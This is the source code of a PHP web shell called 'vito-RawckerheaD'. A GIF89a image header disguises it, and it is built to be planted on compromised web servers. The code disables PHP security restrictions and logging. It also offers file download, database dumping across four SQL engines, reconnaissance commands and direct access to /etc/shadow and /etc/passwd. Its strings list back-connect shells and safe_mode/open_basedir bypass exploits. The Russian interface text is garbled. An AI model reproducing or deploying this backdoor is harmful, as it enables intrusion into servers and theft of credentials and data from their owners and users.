vito-RawckerheaD

GIF89a ? ??????????!? ????,???? ? ??D ?;?

   $language='eng';

   $auth = 0;

   $name='8cd59f852a590eb0565c98356ecb0b84';

   $pass='8cd59f852a590eb0565c98356ecb0b84';

   error_reporting(0);

   @ini_restore("safe_mode");

   @ini_restore("open_basedir");

   @ini_restore("safe_mode_include_dir");

   @ini_restore("safe_mode_exec_dir");

   @ini_restore("disable_functions");

   @ini_restore("allow_url_fopen");

   @ini_set('error_log',NULL);

   @ini_set('log_errors',0);

   if((!@function_exists('ini_get')) || (@ini_get('open_basedir')!=NULL) || (@ini_get('safe_mode_include_dir')!=NULL)){$open_basedir=1;} else{$open_basedir=0;};

   define("starttime",@getmicrotime());

   set_magic_quotes_runtime(0);

   @set_time_limit(0);

   @ini_set('max_execution_time',0);

   @ini_set('output_buffering',0);

   $safe_mode = @ini_get('safe_mode');

   #if(@function_exists('ini_get')){$safe_mode = @ini_get('safe_mode');}else{$safe_mode=1;};

   $version = '';

   if(@version_compare(@phpversion(), '4.1.0') == -1)

    $_POST   = &$HTTP_POST_VARS;

    $_GET    = &$HTTP_GET_VARS;

    $_SERVER = &$HTTP_SERVER_VARS;

    $_COOKIE = &$HTTP_COOKIE_VARS;

   if (@get_magic_quotes_gpc())

    foreach ($_POST as $k=>$v)

     $_POST[$k] = stripslashes($v);

    foreach ($_COOKIE as $k=>$v)

     $_COOKIE[$k] = stripslashes($v);

   if($auth == 1) {

   if (!isset($_SERVER['PHP_AUTH_USER']) || md5($_SERVER['PHP_AUTH_USER'])!==$name || md5($_SERVER['PHP_AUTH_PW'])!==$pass)

      header('WWW-Authenticate: Basic realm="HELLO!"');

      header('HTTP/1.0 401 Unauthorized');

      exit("Access Denied");

   $head = '

   vito-RawckerheaD

';

   class zipfile

       var $datasec      = array();

       var $ctrl_dir     = array();

       var $eof_ctrl_dir = "\x50\x4b\x05\x06\x00\x00\x00\x00";

       var $old_offset   = 0;

       function unix2DosTime($unixtime = 0) {

           $timearray = ($unixtime == 0) ? getdate() : getdate($unixtime);

           if ($timearray['year'] < 1980) {

               $timearray['year']    = 1980;

               $timearray['mon']     = 1;

               $timearray['mday']    = 1;

               $timearray['hours']   = 0;

               $timearray['minutes'] = 0;

               $timearray['seconds'] = 0;

           return (($timearray['year'] - 1980) << 25) | ($timearray['mon'] << 21) | ($timearray['mday'] << 16) |

                   ($timearray['hours'] << 11) | ($timearray['minutes'] << 5) | ($timearray['seconds'] >> 1);

       function addFile($data, $name, $time = 0)

           $name     = str_replace('\\', '/', $name);

           $dtime    = dechex($this->unix2DosTime($time));

           $hexdtime = '\x' . $dtime[6] . $dtime[7]

                     . '\x' . $dtime[4] . $dtime[5]

                     . '\x' . $dtime[2] . $dtime[3]

                     . '\x' . $dtime[0] . $dtime[1];

           eval('$hexdtime = "' . $hexdtime . '";');

           $fr   = "\x50\x4b\x03\x04";

           $fr   .= "\x14\x00";

           $fr   .= "\x00\x00";

           $fr   .= "\x08\x00";

           $fr   .= $hexdtime;

           $unc_len = strlen($data);

           $crc     = crc32($data);

           $zdata   = gzcompress($data);

           $zdata   = substr(substr($zdata, 0, strlen($zdata) - 4), 2);

           $c_len   = strlen($zdata);

           $fr      .= pack('V', $crc);

           $fr      .= pack('V', $c_len);

           $fr      .= pack('V', $unc_len);

           $fr      .= pack('v', strlen($name));

           $fr      .= pack('v', 0);

           $fr      .= $name;

           $fr .= $zdata;

           $this -> datasec[] = $fr;

           $cdrec = "\x50\x4b\x01\x02";

           $cdrec .= "\x00\x00";

           $cdrec .= "\x14\x00";

           $cdrec .= "\x00\x00";

           $cdrec .= "\x08\x00";

           $cdrec .= $hexdtime;

           $cdrec .= pack('V', $crc);

           $cdrec .= pack('V', $c_len);

           $cdrec .= pack('V', $unc_len);

           $cdrec .= pack('v', strlen($name) );

           $cdrec .= pack('v', 0 );

           $cdrec .= pack('v', 0 );

           $cdrec .= pack('v', 0 );

           $cdrec .= pack('v', 0 );

           $cdrec .= pack('V', 32 );

           $cdrec .= pack('V', $this -> old_offset );

           $this -> old_offset += strlen($fr);

           $cdrec .= $name;

           $this -> ctrl_dir[] = $cdrec;

       function file()

           $data    = implode('', $this -> datasec);

           $ctrldir = implode('', $this -> ctrl_dir);

           return

               $data .

               $ctrldir .

               $this -> eof_ctrl_dir .

               pack('v', sizeof($this -> ctrl_dir)) .

               pack('v', sizeof($this -> ctrl_dir)) .

               pack('V', strlen($ctrldir)) .

               pack('V', strlen($data)) .

               "\x00\x00";

   function compress(&$filename,&$filedump,$compress)

       global $content_encoding;

       global $mime_type;

       if ($compress == 'bzip' && @function_exists('bzcompress'))

           $filename  .= '.bz2';

           $mime_type = 'application/x-bzip2';

           $filedump = bzcompress($filedump);

        else if ($compress == 'gzip' && @function_exists('gzencode'))

           $filename  .= '.gz';

           $content_encoding = 'x-gzip';

           $mime_type = 'application/x-gzip';

           $filedump = gzencode($filedump);

        else if ($compress == 'zip' && @function_exists('gzcompress'))

        $filename .= '.zip';

           $mime_type = 'application/zip';

           $zipfile = new zipfile();

           $zipfile -> addFile($filedump, substr($filename, 0, -4));

           $filedump = $zipfile -> file();

        else

        $mime_type = 'application/octet-stream';

   function moreread($temp){

   global $lang,$language;

   $str='';

     if(@function_exists('fopen')&&@function_exists('feof')&&@function_exists('fgets')&&@function_exists('fclose')){

      $ffile = @fopen($temp, "r");

      while(!@feof($ffile)){$str .= @fgets($ffile);}

      fclose($ffile);

     }elseif(@function_exists('fopen')&&@function_exists('fread')&&@function_exists('fclose')&&@function_exists('filesize')){

      $ffile = @fopen($temp, "r");

      $str = @fread($ffile, @filesize($temp));

      @fclose($ffile);

     }elseif(@function_exists('file')){

      $ffiles = @file ($temp);

      foreach ($ffiles as $ffile) { $str .= $ffile; }

     }elseif(@function_exists('file_get_contents')){

      $str = @file_get_contents($temp);

     }elseif(@function_exists('readfile')){

      $str = @readfile($temp);

     }else{echo $lang[$language.'_text56'];}

   return $str;

   function readzlib($filename,$temp=''){

   global $lang,$language;

   $str='';

     if(!$temp) {$temp=tempnam(@getcwd(), "copytemp");};

     if(@copy("compress.zlib://".$filename, $temp)) {

      $str = moreread($temp);

     } else echo $lang[$language.'_text119'];

     @unlink($temp);

   return $str;

   function mailattach($to,$from,$subj,$attach)

    $headers  = "From: $from\r\n";

    $headers .= "MIME-Version: 1.0\r\n";

    $headers .= "Content-Type: ".$attach['type'];

    $headers .= "; name=\"".$attach['name']."\"\r\n";

    $headers .= "Content-Transfer-Encoding: base64\r\n\r\n";

    $headers .= chunk_split(base64_encode($attach['content']))."\r\n";

    if(mail($to,$subj,"",$headers)) { return 1; }

    return 0;

   class my_sql

    var $host = 'localhost';

    var $port = '';

    var $user = '';

    var $pass = '';

    var $base = '';

    var $db   = '';

    var $connection;

    var $res;

    var $error;

    var $rows;

    var $columns;

    var $num_rows;

    var $num_fields;

    var $dump;

    function connect()

     switch($this->db)

      case 'MySQL':

       if(empty($this->port)) { $this->port = '3306'; }

       if(!@function_exists('mysql_connect')) return 0;

       $this->connection = @mysql_connect($this->host.':'.$this->port,$this->user,$this->pass);

       if(is_resource($this->connection)) return 1;

      break;

        case 'MSSQL':

         if(empty($this->port)) { $this->port = '1433'; }

       if(!@function_exists('mssql_connect')) return 0;

       $this->connection = @mssql_connect($this->host.','.$this->port,$this->user,$this->pass);

         if($this->connection) return 1;

        break;

        case 'PostgreSQL':

         if(empty($this->port)) { $this->port = '5432'; }

         $str = "host='".$this->host."' port='".$this->port."' user='".$this->user."' password='".$this->pass."' dbname='".$this->base."'";

         if(!@function_exists('pg_connect')) return 0;

         $this->connection = @pg_connect($str);

         if(is_resource($this->connection)) return 1;

        break;

        case 'Oracle':

         if(!@function_exists('ocilogon')) return 0;

         $this->connection = @ocilogon($this->user, $this->pass, $this->base);

         if(is_resource($this->connection)) return 1;

        break;

       return 0;

    function select_db()

      switch($this->db)

     case 'MySQL':

      if(@mysql_select_db($this->base,$this->connection)) return 1;

       break;

       case 'MSSQL':

      if(@mssql_select_db($this->base,$this->connection)) return 1;

       break;

       case 'PostgreSQL':

        return 1;

       break;

       case 'Oracle':

        return 1;

       break;

      return 0;

    function query($query)

      $this->res=$this->error='';

      switch($this->db)

     case 'MySQL':

        if(false===($this->res=@mysql_query('/*'.chr(0).'*/'.$query,$this->connection)))

         $this->error = @mysql_error($this->connection);

         return 0;

        else if(is_resource($this->res)) { return 1; }

        return 2;

     break;

       case 'MSSQL':

        if(false===($this->res=@mssql_query($query,$this->connection)))

         $this->error = 'Query error';

         return 0;

         else if(@mssql_num_rows($this->res) > 0) { return 1; }

        return 2;

       break;

       case 'PostgreSQL':

        if(false===($this->res=@pg_query($this->connection,$query)))

         $this->error = @pg_last_error($this->connection);

         return 0;

         else if(@pg_num_rows($this->res) > 0) { return 1; }

        return 2;

       break;

       case 'Oracle':

        if(false===($this->res=@ociparse($this->connection,$query)))

         $this->error = 'Query parse error';

        else

         if(@ociexecute($this->res))

          if(@ocirowcount($this->res) != 0) return 2;

          return 1;

         $error = @ocierror();

         $this->error=$error['message'];

       break;

     return 0;

    function get_result()

      $this->rows=array();

      $this->columns=array();

      $this->num_rows=$this->num_fields=0;

      switch($this->db)

     case 'MySQL':

      $this->num_rows=@mysql_num_rows($this->res);

      $this->num_fields=@mysql_num_fields($this->res);

      while(false !== ($this->rows[] = @mysql_fetch_assoc($this->res)));

      @mysql_free_result($this->res);

      if($this->num_rows){$this->columns = @array_keys($this->rows[0]); return 1;}

       break;

       case 'MSSQL':

      $this->num_rows=@mssql_num_rows($this->res);

      $this->num_fields=@mssql_num_fields($this->res);

      while(false !== ($this->rows[] = @mssql_fetch_assoc($this->res)));

      @mssql_free_result($this->res);

      if($this->num_rows){$this->columns = @array_keys($this->rows[0]); return 1;};

       break;

       case 'PostgreSQL':

      $this->num_rows=@pg_num_rows($this->res);

      $this->num_fields=@pg_num_fields($this->res);

      while(false !== ($this->rows[] = @pg_fetch_assoc($this->res)));

      @pg_free_result($this->res);

      if($this->num_rows){$this->columns = @array_keys($this->rows[0]); return 1;}

       break;

       case 'Oracle':

        $this->num_fields=@ocinumcols($this->res);

        while(false !== ($this->rows[] = @oci_fetch_assoc($this->res))) $this->num_rows++;

        @ocifreestatement($this->res);

        if($this->num_rows){$this->columns = @array_keys($this->rows[0]); return 1;}

       break;

      return 0;

    function dump($table)

      if(empty($table)) return 0;

      $this->dump=array();

      $this->dump[0] = '##';

      $this->dump[1] = '## --------------------------------------- ';

      $this->dump[2] = '##  Created: '.date ("d/m/Y H:i:s");

      $this->dump[3] = '## Database: '.$this->base;

      $this->dump[4] = '##    Table: '.$table;

      $this->dump[5] = '## --------------------------------------- ';

      switch($this->db)

     case 'MySQL':

      $this->dump[0] = '## MySQL dump';

      if($this->query('/*'.chr(0).'*/ SHOW CREATE TABLE `'.$table.'`')!=1) return 0;

      if(!$this->get_result()) return 0;

      $this->dump[] = $this->rows[0]['Create Table'];

        $this->dump[] = '## --------------------------------------- ';

      if($this->query('/*'.chr(0).'*/ SELECT * FROM `'.$table.'`')!=1) return 0;

      if(!$this->get_result()) return 0;

      for($i=0;$i<$this->num_rows;$i++)

         foreach($this->rows[$i] as $k=>$v) {$this->rows[$i][$k] = @mysql_real_escape_string($v);}

       $this->dump[] = 'INSERT INTO `'.$table.'` (`'.@implode("`, `", $this->columns).'`) VALUES (\''.@implode("', '", $this->rows[$i]).'\');';

       break;

       case 'MSSQL':

        $this->dump[0] = '## MSSQL dump';

        if($this->query('SELECT * FROM '.$table)!=1) return 0;

      if(!$this->get_result()) return 0;

      for($i=0;$i<$this->num_rows;$i++)

         foreach($this->rows[$i] as $k=>$v) {$this->rows[$i][$k] = @addslashes($v);}

       $this->dump[] = 'INSERT INTO '.$table.' ('.@implode(", ", $this->columns).') VALUES (\''.@implode("', '", $this->rows[$i]).'\');';

       break;

       case 'PostgreSQL':

        $this->dump[0] = '## PostgreSQL dump';

        if($this->query('SELECT * FROM '.$table)!=1) return 0;

      if(!$this->get_result()) return 0;

      for($i=0;$i<$this->num_rows;$i++)

         foreach($this->rows[$i] as $k=>$v) {$this->rows[$i][$k] = @addslashes($v);}

       $this->dump[] = 'INSERT INTO '.$table.' ('.@implode(", ", $this->columns).') VALUES (\''.@implode("', '", $this->rows[$i]).'\');';

       break;

       case 'Oracle':

         $this->dump[0] = '## ORACLE dump';

         $this->dump[]  = '## under construction';

       break;

       default:

        return 0;

       break;

      return 1;

    function close()

      switch($this->db)

     case 'MySQL':

      @mysql_close($this->connection);

       break;

       case 'MSSQL':

        @mssql_close($this->connection);

       break;

       case 'PostgreSQL':

        @pg_close($this->connection);

       break;

       case 'Oracle':

        @oci_close($this->connection);

       break;

    function affected_rows()

      switch($this->db)

     case 'MySQL':

      return @mysql_affected_rows($this->res);

       break;

       case 'MSSQL':

        return @mssql_affected_rows($this->res);

       break;

       case 'PostgreSQL':

        return @pg_affected_rows($this->res);

       break;

       case 'Oracle':

        return @ocirowcount($this->res);

       break;

       default:

        return 0;

       break;

   if(!empty($_POST['cmd']) && $_POST['cmd']=="download_file" && !empty($_POST['d_name']))

     if($file=@fopen($_POST['d_name'],"r")){ $filedump = @fread($file,@filesize($_POST['d_name'])); @fclose($file); }

     else if ($file=readzlib($_POST['d_name'])) { $filedump = $file; } else { err(1,$_POST['d_name']); $_POST['cmd']=""; }

     if(isset($_POST['cmd']))

       @ob_clean();

       $filename = @basename($_POST['d_name']);

       $content_encoding=$mime_type='';

       compress($filename,$filedump,$_POST['compress']);

       if (!empty($content_encoding)) { header('Content-Encoding: ' . $content_encoding); }

       header("Content-type: ".$mime_type);

       header("Content-disposition: attachment; filename=\"".$filename."\";");

       echo $filedump;

       exit();

   if(isset($_GET['phpinfo'])) { echo @phpinfo(); echo "
[ BACK ]
"; die(); }

   if (!empty($_POST['cmd']) && $_POST['cmd']=="db_query")

    echo $head;

    $sql = new my_sql();

    $sql->db   = $_POST['db'];

    $sql->host = $_POST['db_server'];

    $sql->port = $_POST['db_port'];

    $sql->user = $_POST['mysql_l'];

    $sql->pass = $_POST['mysql_p'];

    $sql->base = $_POST['mysql_db'];

    $querys = @explode(';',$_POST['db_query']);

    echo '';

    if(!$sql->connect()) echo "Can't connect to SQL server
";

     else

      if(!empty($sql->base)&&!$sql->select_db()) echo "Can't select database
";

      else

       foreach($querys as $num=>$query)

         if(strlen($query)>5)

         echo "Query#".$num." : ".htmlspecialchars($query,ENT_QUOTES)."
";

         switch($sql->query($query))

          case '0':

          echo "Error : ".$sql->error."
";

          break;

          case '1':

          if($sql->get_result())

          echo "";                                                          foreach($sql->columns as $k=>$v) $sql->columns[$k] = htmlspecialchars($v,ENT_QUOTES);
          $keys = @implode(" 
";           for($i=0;$i<$sql->num_rows;$i++)                                        
            {                                                                      
            foreach($sql->rows[$i] as $k=>$v) $sql->rows[$i][$k] = htmlspecialchars($v,ENT_QUOTES);
            $values = @implode(" 
';            }                                                                      
           echo "


 ", $sql->columns);
           echo "
 ".$keys." 



 ",$sql->rows[$i]);
            echo '
 '.$values.' 

";

          break;

          case '2':

          $ar = $sql->affected_rows()?($sql->affected_rows()):('0');

          echo "affected rows : ".$ar."

";

          break;

    echo "
";

    echo in('hidden','db',0,$_POST['db']);

    echo in('hidden','db_server',0,$_POST['db_server']);

    echo in('hidden','db_port',0,$_POST['db_port']);

    echo in('hidden','mysql_l',0,$_POST['mysql_l']);

    echo in('hidden','mysql_p',0,$_POST['mysql_p']);

    echo in('hidden','mysql_db',0,$_POST['mysql_db']);

    echo in('hidden','cmd',0,'db_query');

    echo "";

    echo "Base: base."\">
";

    echo "".(!empty($_POST['db_query'])?($_POST['db_query']):("SHOW DATABASES;\nSELECT * FROM user;"))."


";

    echo "";

    echo "
[ BACK ]
"; die();

   if(isset($_GET['delete']))

      @unlink(__FILE__);

   if(isset($_GET['tmp']))

      @unlink("/tmp/bdpl");

      @unlink("/tmp/back");

      @unlink("/tmp/bd");

      @unlink("/tmp/bd.c");

      @unlink("/tmp/dp");

      @unlink("/tmp/dpc");

      @unlink("/tmp/dpc.c");

      @unlink("/tmp/prxpl");

      @unlink("/tmp/grep.txt");

   if(isset($_GET['phpini']))

   echo $head;

   function U_value($value)

    if ($value == '') return 'no value';

    if (@is_bool($value)) return $value ? 'TRUE' : 'FALSE';

    if ($value === null) return 'NULL';

    if (@is_object($value)) $value = (array) $value;

    if (@is_array($value))

    @ob_start();

    print_r($value);

    $value = @ob_get_contents();

    @ob_end_clean();

    return U_wordwrap((string) $value);

   function U_wordwrap($str)

    $str = @wordwrap(@htmlspecialchars($str), 100, '', true);

    return @preg_replace('!(&[^;]*)([^;]*;)!', '$1$2', $str);

   if (@function_exists('ini_get_all'))

    $r = '';

    echo '', '';    foreach (@ini_get_all() as $key=>$value)                                       
     {                                                                             
     $r .= '
';     }                                                                             
    echo $r;                                                                       
    echo '
Directive Local Value Master Value


'.ws(3).''.$key.' '.U_value($value['local_value']).' '.U_value($value['global_value']).'


';

   echo "
[ BACK ]
";

   die();

   if(isset($_GET['cpu']))

      echo $head;

      echo 'CPU
';      $cpuf = @file("cpuinfo");                                                    
      if($cpuf)                                                                    
       {                                                                           
         $c = @sizeof($cpuf);                                                      
         for($i=0;$i<$c;$i++)                                                      
           {                                                                       
             $info = @explode(":",$cpuf[$i]);                                      
             if($info[1]==""){ $info[1]="---"; }                                   
             $r .= '
';           }                                                                       
         echo $r;                                                                  
       }                                                                           
      else                                                                         
       {                                                                           
         echo '
';       }                                                                           
      echo '









'.ws(3).''.trim($info[0]).' '.trim($info[1]).'





'.ws(3).' --- 

';

      echo "
[ BACK ]
";

      die();

   if(isset($_GET['mem']))

      echo $head;

      echo 'MEMORY
';      $memf = @file("meminfo");                                                    
      if($memf)                                                                    
       {                                                                           
         $c = sizeof($memf);                                                       
         for($i=0;$i<$c;$i++)                                                      
           {                                                                       
             $info = explode(":",$memf[$i]);                                       
             if($info[1]==""){ $info[1]="---"; }                                   
             $r .= '
';           }                                                                       
         echo $r;                                                                  
       }                                                                           
      else                                                                         
       {                                                                           
         echo '
';       }                                                                           
      echo '









'.ws(3).''.trim($info[0]).' '.trim($info[1]).'





'.ws(3).' --- 

';

      echo "
[ BACK ]
";

      die();

   if(isset($_GET['dmesg(8)']))

    {$_POST['cmd'] = 'dmesg(8)';}

   if(isset($_GET['free']))

    {$_POST['cmd'] = 'free';}

   if(isset($_GET['vmstat']))

    {$_POST['cmd'] = 'vmstat';}

   if(isset($_GET['lspci']))

    {$_POST['cmd'] = 'lspci';}

   if(isset($_GET['lsdev']))

    {$_POST['cmd'] = 'lsdev';}

   if(isset($_GET['procinfo']))

    {$_POST['cmd']='cat /proc/cpuinfo';}

   if(isset($_GET['version']))

    {$_POST['cmd']='cat /proc/version';}

   if(isset($_GET['interrupts']))

    {$_POST['cmd']='cat /proc/interrupts';}

   if(isset($_GET['realise1']))

    {$_POST['cmd'] = 'cat /etc/*realise';}

   if(isset($_GET['service']))

    {$_POST['cmd'] = 'service --status-all';}

   if(isset($_GET['ifconfig']))

    {$_POST['cmd'] = 'ifconfig';}

   if(isset($_GET['w']))

    {$_POST['cmd'] = 'w';}

   if(isset($_GET['who']))

    {$_POST['cmd'] = 'who';}

   if(isset($_GET['uptime']))

    {$_POST['cmd'] = 'uptime';}

   if(isset($_GET['last']))

    {$_POST['cmd'] = 'last -n 10';}

   if(isset($_GET['psaux']))

    {$_POST['cmd'] = 'ps -aux';}

   if(isset($_GET['netstat']))

    {$_POST['cmd'] = 'netstat -a';}

   if(isset($_GET['lsattr']))

    {$_POST['cmd'] = 'lsattr -va';}

   if(isset($_GET['syslog']))

    {$_POST['cmd']='edit_file';$_POST['e_name'] = '/etc/syslog.conf';}

   if(isset($_GET['fstab']))

    {$_POST['cmd']='edit_file';$_POST['e_name'] = '/etc/fstab';}

   if(isset($_GET['fdisk']))

    {$_POST['cmd'] = 'fdisk -l';}

   if(isset($_GET['df']))

    {$_POST['cmd'] = 'df -h';}

   if(isset($_GET['realise2']))

    {$_POST['cmd']='edit_file';$_POST['e_name'] = '/etc/issue.net';}

   if(isset($_GET['hosts']))

    {$_POST['cmd']='edit_file';$_POST['e_name'] = '/etc/hosts';}

   if(isset($_GET['resolv']))

    {$_POST['cmd']='edit_file';$_POST['e_name'] = '/etc/resolv.conf';}

   if(isset($_GET['systeminfo']))

    {$_POST['cmd'] = 'systeminfo';}

   if(isset($_GET['shadow']))

    {$_POST['cmd']='edit_file';$_POST['e_name'] = '/etc/shadow';}

   if(isset($_GET['passwd']))

    {$_POST['cmd']='edit_file';$_POST['e_name'] = '/etc/passwd';}

   #if(isset($_GET['']))

   # {$_POST['cmd'] = '';}

   $lang=array(

   'ru_text1' =>'A ???? ?  ? ?? ',

   'ru_text2' =>'A ??? ?  ? ?? ?  ??? ???',

   'ru_text3' =>'A ? ?   ? ???',

   'ru_text4' =>'? ? ? ? ?? ? ? ?',

   'ru_text5' =>'C ???    ?  ??? ??',

   'ru_text6' =>'E ?   ',

   'ru_text7' =>'A ? ',

   'ru_text8' =>'A ??? ??  ?',

   'ru_butt1' =>'A ? ? ',

   'ru_butt2' =>'C ??? ? ',

   'ru_text9' =>'I? ? ? ?  ??     ? ?  ??    /bin/bash',

   'ru_text10'=>'I? ? ?   ??',

   'ru_text11'=>'I ?  ? ? ? ??? ',

   'ru_butt3' =>'I? ? ? ',

   'ru_text12'=>'back-connect',

   'ru_text13'=>'IP- ????',

   'ru_text14'=>'I ??',

   'ru_butt4' =>'A ? ? ',

   'ru_text15'=>'C ???    ? ?? ??? ?  ??? ?? ',

   'ru_text16'=>'E? ? ',

   'ru_text17'=>'?? ???   ',

   'ru_text18'=>'E ?   ',

   'ru_text19'=>'Exploits',

   'ru_text20'=>'E? ? ',

   'ru_text21'=>'? ?  ??',

   'ru_text22'=>'datapipe',

   'ru_text23'=>'E ?   ??',

   'ru_text24'=>'?? ???  ? ??',

   'ru_text25'=>'?? ???   ??',

   'ru_text26'=>'E? ? ',

   'ru_butt5' =>'C ??? ? ',

   'ru_text28'=>'? ? ?    safe_mode',

   'ru_text29'=>'? ???   ?? ??',

   'ru_butt6' =>'???? ? ',

   'ru_text30'=>'I? ?? ??  ',

   'ru_butt7' =>'A ??? ',

   'ru_text31'=>'O  ?? ? ???',

   'ru_text32'=>'A ??? ? PHP  ? ',

   'ru_text33'=>'I? ??   ? ?? ??   ?? ?   ?? ? ??  open_basedir  ???   ?? ?  cURL (PHP <= 4.4.2, 5.1.4)',

   'ru_butt8' =>'I? ?? ? ',

   'ru_text34'=>'I? ??   ? ?? ??   ?? ?   ?? ? ??  safe_mode  ???   ?? ? ? include',

   'ru_text35'=>'I? ??   ? ?? ??   ?? ?   ?? ? ??  safe_mode  ???   ??? ?     mysql',

   'ru_text36'=>'?  . ? ? ? ',

   'ru_text37'=>'E ? ?',

   'ru_text38'=>'I ? ',

   'ru_text39'=>'? ',

   'ru_text40'=>'? ?  ? ? ?  ?  ? ?? ?',

   'ru_butt9' =>'? ? ',

   'ru_text41'=>'? ?? ? ?     ?',

   'ru_text42'=>'??? ? ? ? ?  ',

   'ru_text43'=>'??? ? ? ?   ',

   'ru_butt10'=>'? ?? ? ? ',

   'ru_butt11'=>'??? ? ? ? ',

   'ru_text44'=>'??? ? ? ? ?   ?? ? ?? ! ? ???  ?  ? ?  ??? ?!',

   'ru_text45'=>'O  ? ?? ???',

   'ru_text46'=>'I? ?? ?? phpinfo()',

   'ru_text47'=>'I? ?? ?? ? ??? ?  php.ini',

   'ru_text48'=>'?? ?? ?  ?????? ?  ',

   'ru_text49'=>'?? ?? ? ? ? ?  ? ??? ?? ',

   'ru_text50'=>'E? ?? ? ?    ? ???? ??',

   'ru_text51'=>'E? ?? ? ?    ??? ',

   'ru_text52'=>'?? ?? ? ?  ? ',

   'ru_text53'=>'E? ?     ?',

   'ru_text54'=>'I ?  ?? ??     ?',

   'ru_butt12'=>'? ? ',

   'ru_text55'=>'?     ?',

   'ru_text56'=>'? ??  ?? ? ??? ',

   'ru_text57'=>'? ? ? /?? ?  O /? ?? ? ? ?',

   'ru_text58'=>'E??',

   'ru_text59'=>'O ',

   'ru_text60'=>'? ?? ? ? ?',

   'ru_butt13'=>'? ? ? /?? ? ',

   'ru_text61'=>'O  ? ? ?',

   'ru_text62'=>'? ?? ? ? ? ? ? ? ',

   'ru_text63'=>'O  ?? ??',

   'ru_text64'=>'? ?? ? ? ? ?? ?? ',

   'ru_text65'=>'? ? ? ',

   'ru_text66'=>'?? ? ',

   'ru_text67'=>'Chown/Chgrp/Chmod',

   'ru_text68'=>'E ? ?? ',

   'ru_text69'=>'I ? ????1',

   'ru_text70'=>'I ? ????2',

   'ru_text71'=>"A? ?   ? ????  ? ?? :\r\n- ? ? CHOWN -  ?? ? ?   ?? ?   ??  UID ( ? ?) \r\n- ? ?  ? ??  CHGRP -  ?? ???    GID ( ? ?) \r\n- ? ?  ? ??  CHMOD - ?? ?  ?     ? ??? ? ?  ????? ??  (? ? ??? 0777)",

   'ru_text72'=>'?? ?? ? ?  ? ',

   'ru_text73'=>'E? ?     ?',

   'ru_text74'=>'E? ?     ?',

   'ru_text75'=>'* ? ??   ? ?  ???? ??? ?  ? ??? ?',

   'ru_text76'=>'I ?  ?? ??     ? ?  ? ? ?? ?  find',

   'ru_text80'=>'? ',

   'ru_text81'=>'??? ',

   'ru_text82'=>'?  ? ?? ?',

   'ru_text83'=>'A ??? ? SQL  ? ? ',

   'ru_text84'=>'SQL  ? ?',

   'ru_text85'=>'I? ??   ? ?? ??   ?? ?   ?? ? ??  safe_mode  ???   ??? ?  ? ??   MSSQL ??? ???',

   'ru_text86'=>'? ? ?   ? ??? ?? ',

   'ru_butt14'=>'? ? ',

   'ru_text87'=>'? ? ?   ? ?? ??? ?  ftp-??? ?? ',

   'ru_text88'=>'??? ??: ??',

   'ru_text89'=>'O  ?  ftp ??? ???',

   'ru_text90'=>'??? ?  ???? ',

   'ru_text91'=>'A?? ? ?   ',

   'ru_text92'=>'??   ?? .',

   'ru_text93'=>'FTP',

   'ru_text94'=>'FTP-???? ??',

   'ru_text95'=>'? ?   ?? ? ',

   'ru_text96'=>'?? ?? ?   ? ?  ? ?   ?? ? ',

   'ru_text97'=>'I? ????   ?? ? ? : ',

   'ru_text98'=>'?? ? ?  ? ? ?? : ',

   'ru_text99'=>'/etc/passwd',

   'ru_text100'=>'I? ?    ?  ?? ???   ?  ??? ??',

   'ru_text101'=>' ??? ????? ? (user -> resu)',

   'ru_text102'=>'I ? ',

   'ru_text103'=>'I? ?   ? ? ',

   'ru_text104'=>'I? ?    ?   ?  ? ',

   'ru_text105'=>'E ??',

   'ru_text106'=>'I?',

   'ru_text107'=>'??? ',

   'ru_butt15'=>'I? ? ? ',

   'ru_text108'=>'?? ??  ? ? ',

   'ru_text109'=>'? ????? ',

   'ru_text110'=>'? ????? ',

   'ru_text111'=>'SQL-??? ?? :  ??',

   'ru_text112'=>'I? ??   ? ?? ??   ?? ?   ?? ? ??  safe_mode  ???   ? ? ?  ?? ?  mb_send_mail (PHP <= 4.0-4.2.2, 5.x)',

   'ru_text113'=>'I? ??   ? ?? ??   ?? ?   ?? ? ??  safe_mode,  ? ?? ??  ?? ??  ? ?? ? ?  ?  ? ? ?? imap_list (PHP <= 5.1.2)',

   'ru_text114'=>'I? ??   ? ?? ??   ?? ?   ?? ? ??  safe_mode,  ? ?? ?? ? ???? ? ?    ?  ? ? ?? imap_body (PHP <= 5.1.2)',

   'ru_text115'=>'I? ??   ? ?? ??   ?? ?   ?? ? ??  safe_mode,  ? ? ?   ? [compress.zlib://] (PHP <= 4.4.2, 5.1.2)',

   'ru_text116'=>'E ? ?   ',

   'ru_text117'=>' ',

   'ru_text118'=>'O  ? ? ?',

   'ru_text119'=>'?? ?? ?  ? ? ?   ',

   'ru_text120'=>'I? ??   ? ?? ??   ?? ?   ?? ? ??  safe_mode,  ? ?? ?? ? ???? ? ?    ?  ? ? ?? ini_restore (PHP <= 4.4.4, 5.1.6) By KingDefacer',

   'ru_text121'=>'I? ??   ? ?? ??   ?? ?   ?? ? ??  open_basedir,  ? ?? ??  ?? ??  ? ?? ? ?  ?  ? ? ?? fopen (PHP v4.4.0 memory leak) By KingDefacer',

   'ru_text122'=>'I? ??   ? ?? ??   ?? ?   ?? ? ??  open_basedir,  ? ?? ??  ?? ??  ? ?? ? ?  ?  ? ? ?? glob (PHP <= 5.2.x)',

   'ru_text123'=>'I? ??   ? ?? ??   ?? ?   ?? ? ??  open_basedir,  ??? ? *.bzip  ??  [compress.bzip2://] (PHP <= 5.2.1)',

   'ru_text124'=>'I? ??   ? ?? ??   ?? ?   ?? ? ??  open_basedir, ? ?    ? error_log[php://] (PHP <= 5.1.4, 4.4.2)',

   'ru_text125'=>'? ?? ?',

   'ru_text126'=>'I? ??   ? ?? ??   ?? ?   ?? ? ??  open_basedir, ? ? ? ?   ????  ? ? ?? ? [NULL-byte] (PHP <= 5.2.0)',

   'ru_text127'=>'I? ??   ? ?? ??   ?? ?   ?? ? ??  open_basedir, ? ?    ? readfile[php://] (PHP <= 5.2.1, 4.4.4)',

   'ru_text128'=>'? ?   ????? ?\? ??? (touch)',

   'ru_text129'=>'I? ??   ? ?? ??   ?? ?   ?? ? ??  open_basedir, ? ? ? ?   ? fopen[srpath://] (PHP v5.2.0)',

   'ru_text130'=>'I? ??   ? ?? ??   ?? ?   ?? ? ??  open_basedir,  ??? ? *.zip  ??  [zip://] (PHP <= 5.2.1)',

   'ru_text131'=>'I? ??   ? ?? ??   ?? ?   ?? ? ??  open_basedir,  ? ?? ?? ? ???? ? ?    ?  ? ? ?? symlink() (PHP <= 5.2.1)',

